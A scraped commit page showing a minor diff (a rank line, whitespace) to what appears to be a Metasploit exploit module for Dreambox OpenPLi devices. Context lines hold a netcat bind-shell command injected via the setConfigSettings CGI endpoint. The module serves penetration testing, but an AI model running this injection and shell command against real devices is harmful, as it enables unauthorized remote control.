We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 121a736 commit 3ab5585Copy full SHA for 3ab5585
modules/exploits/linux/http/dreambox_openpli_shell.rb
@@ -9,6 +9,8 @@
9
require 'msf/core'
10
11
class Metasploit3 < Msf::Exploit::Remote
12
+ Rank = GreatRanking
13
+
14
include Msf::Exploit::Remote::Tcp
15
include Msf::Exploit::Remote::HttpClient
16
@@ -71,7 +73,7 @@ def exploit
71
73
72
74
payl = datastore['PAYLOAD']
75
- uri = '/cgi-bin/setConfigSettings'
76
+ uri = '/cgi-bin/setConfigSettings'
77
78
if payl =~ /bind/
79
cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc -l -p #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")
@@ -107,5 +109,4 @@ def exploit
107
109
handler
108
110
disconnect
111
end
-
112
0 commit comments